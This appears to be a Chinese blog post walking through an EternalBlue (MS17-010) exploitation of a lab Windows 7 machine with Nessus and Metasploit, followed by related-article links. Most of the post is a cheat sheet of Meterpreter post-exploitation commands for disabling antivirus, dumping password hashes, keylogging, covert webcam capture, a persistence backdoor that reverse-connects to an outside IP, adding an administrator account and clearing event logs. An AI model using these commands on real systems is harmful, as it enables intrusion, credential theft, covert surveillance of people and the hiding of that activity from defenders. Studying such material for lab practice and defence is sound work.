环境部署

靶机:win7(172.168.100.158)
工具机:kali,nessus

攻击步骤

1、nessus扫描靶机

2、根据扫描结果查看靶机漏洞

3、发现靶机存在永恒之蓝(MS17-010)漏洞

4、打开工具机kali,打开MSF漏洞利用框架

5、搜索相关漏洞利用模块

5、利用MS17-010漏洞攻击模块进行攻击

(1)use调用攻击模块

(2)options查看需要进行的设置

(3)set命令设置rhost(目标主机)

(4)run(exploit)进行攻击

6、攻击成功。获取权限

渗透常用命令

下面展示一些 msf及后渗透常用命令。

// 常用命令
chcp 65001                                       #shell 编码乱码
run post/windows/manage/migrate                  #自动进程迁移
run post/windows/gather/checkvm                  #查看目标主机是否运行在虚拟机上
run post/windows/manage/killav                   #关闭杀毒软件
run post/windows/manage/enable_rdp               #开启远程桌面服务
run post/windows/manage/autoroute                #查看路由信息
run post/windows/gather/enum_logged_on_users     #列举当前登录的用户
run post/windows/gather/enum_applications        #列举应用程序
run windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run windows/gather/smart_hashdump                #dump出所有用户的hash
clearev                                          #清除事件日志
sysinfo                              #查看目标主机系统信息
run scraper                          #查看目标主机详细信息
run hashdump                         #导出密码的哈希
load kiwi                        #加载
ps                               #查看目标主机进程信息
pwd                              #查看目标当前目录(windows)
getlwd                           #查看目标当前目录(Linux)
search -f *.jsp -d e:\                       #搜索E盘中所有以.jsp为后缀的文件
download  e:\test.txt  /root                 #将目标机的e:\test.txt文件下载到/root目录下
upload    /root/test.txt d:\test             #将/root/test.txt上传到目标机的 d:\test\ 目录下
getpid                               #查看当前Meterpreter Shell的进程
PIDmigrate 1384                      #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime                             #查看主机运行时间
getuid                           #查看获取的当前权限
getsystem                        #提权
run  killav                      #关闭杀毒软件
screenshot                       #截图
webcam_list                      #查看目标主机的摄像头
webcam_snap                      #拍照
webcam_stream                    #开视频
execute  参数  -f 可执行文件    #执行可执行程序
run getgui -u hack -p 123        #创建hack用户,密码为123
run getgui -e                        #开启远程桌面
keyscan_start                            #开启键盘记录功能
keyscan_dump                             #显示捕捉到的键盘记录信息
keyscan_stop                             #停止键盘记录功能
uictl  disable  keyboard                 #禁止目标使用键盘
uictl  enable   keyboard                 #允许目标使用键盘
uictl  disable  mouse                    #禁止目标使用鼠标
uictl  enable   mouse                    #允许目标使用鼠标
load                                 #使用扩展库
run                              #使用扩展库
run persistence -X -i 5 -p 8888 -r 192.168.10.27 #反弹时间间隔是5s 会自动连接192.168.27的4444端口,缺点是容易被杀毒软件查杀
portfwd add -l 3389 -r 192.168.11.13 -p 3389     #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
clearev                                  #清除日志

命令示例

Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
sysinfo #查看目标主机系统信息

run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上

run post/windows/manage/migrate #自动进程迁移

run post/windows/manage/killav #关闭杀毒软件,由于靶机未装杀毒软件。所以未发现进程

run post/windows/manage/enable_rdp #开启远程桌面服务

run post/windows/gather/enum_logged_on_users #列举当前登录的用户

run windows/gather/smart_hashdump #dump出所有用户的hash

获取权限后shell,输入shell发现乱码,这是编码问题

输入chcp 65001解决乱码问题

增加用户并提权
net user 用户名 密码 /add
net localgroup administrators test /add

查看ip,利用创建好的账号密码远程登陆


永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令相关推荐

  1. CVE-2018-8174漏洞复现及内网渗透攻击

    文章目录 说明 CVE-2018-8174漏洞简介 Persistence后门 环境搭建 拓扑图 Win server 2008 对Windows 7开启1433端口 内网攻击过程 1号机获得2号机的 ...

  2. Windows经常蓝屏 启动速度慢 经常死机 +常用dos命令(win10、win11适用)

    Windows经常蓝屏 启动速度慢 经常死机 +常用dos命令(win10.win11适用) Windows下常用的Dos命令 文件操作 目录切换:cd 切换到别的盘 (比如D盘) d: 查看当前目录 ...

  3. 永恒之蓝(ms17-010)简介与复现

    一.永恒之蓝的介绍 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝&q ...

  4. 永恒之蓝和震网病毒复现

    永恒之蓝 1.打开msf 2.漏洞编码查找 search ms17_010 使用:use auxiliary/scanner/smb/smb_ms17_010 靶机探测:set rhosts 192. ...

  5. 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用

            好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷 ...

  6. 漏洞复现----6、Jenkins远程命令执行漏洞(CVE-2018-1000861)

    文章目录 一.Jenkins简介 二.CVE-2018-1000861简介 三.漏洞复现 一.Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发. 可用于自动化各种任务,如 ...

  7. 【漏洞利用】使用永恒之蓝的双倍脉冲模块(Eternalblue_doublepulsar)渗透攻击Win_7 32位主机

    使用这个模块本来是用来做攻击测试的,但是我始终没有测试成功,我大概花了1天半的时间,一直在研究为什么网上的文章里都显示测试成功了,我的就没有成功,一直在找原因,因为除了时间上的差异,kali模块增多, ...

  8. CVE-2018-1111漏洞复现-环境搭建与dhcp命令注入

    0×01 前言 2018年5月,在Red Hat Enterprise Linux多个版本的DHCP客户端软件包所包含的NetworkManager集成脚本中发现了命令注入漏洞(CVE-2018-11 ...

  9. 永恒之蓝漏洞复现测试

    永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...

最新文章

  1. 微信小程序wx:for 的使用
  2. window环境Visual Studio配置:OpenCV,Eigen,jsoncpp
  3. JavaScript 技术篇-js自动转换类型,自动转换为字符串,js避免自动转换的坑
  4. 计算机编程结构类型,运城计算机编程内存的概念与结构类型
  5. virtualenv 模块
  6. NodeJS学习笔记(一)——搭建开发框架Express,实现Web网站登录验证
  7. 《SuperMap GIS二次开发MVC实战训练---江海区慢性病防治院系统》项目研发阶段性总结
  8. Android studio安装过程中入的坑的记录与记录
  9. 修改ftp服务器用户,通过批处理修改FTP账号和密码
  10. java泛型通俗讲解
  11. jmeter压力测试的辅助插件和实操技巧
  12. Weblogic 视频教程免费下载
  13. 数组对象转json格式
  14. 【多元统计分析及R语言建模】第一章第 多元统计分析的概述
  15. nfc加密卡pm3和pm5区别_【黑科技】NFC模拟门卡门禁
  16. 设置QQ空间背景音乐
  17. MySQL year函数
  18. 什么是PaaS平台?一文看懂SaaS、PaaS和私有化部署的区别
  19. cad移动时捕捉不到基点_CAD很难学吗?其实不然,掌握这10个知识你就能走天下!...
  20. Codeforces 821B Okabe and Banana Trees 题解

热门文章

  1. 西部数据蓝盘 绿盘和黑盘 到底有什么区别?
  2. 国产电动汽车与特斯拉差多少?
  3. SQL 的一点简单的面试题求助
  4. poj 计算几何 分类
  5. 【阶段一】菜学21.11
  6. 计算机修改人类记忆曲线,艾宾浩斯遗忘曲线和费曼技巧
  7. 简简单单,做自己的视频加密软件
  8. ORACLE XE在centos平台下安装方法
  9. 《Learning without Forgetting》 论文阅读笔记
  10. 三星官宣所有5G设备信息图 看完有何感想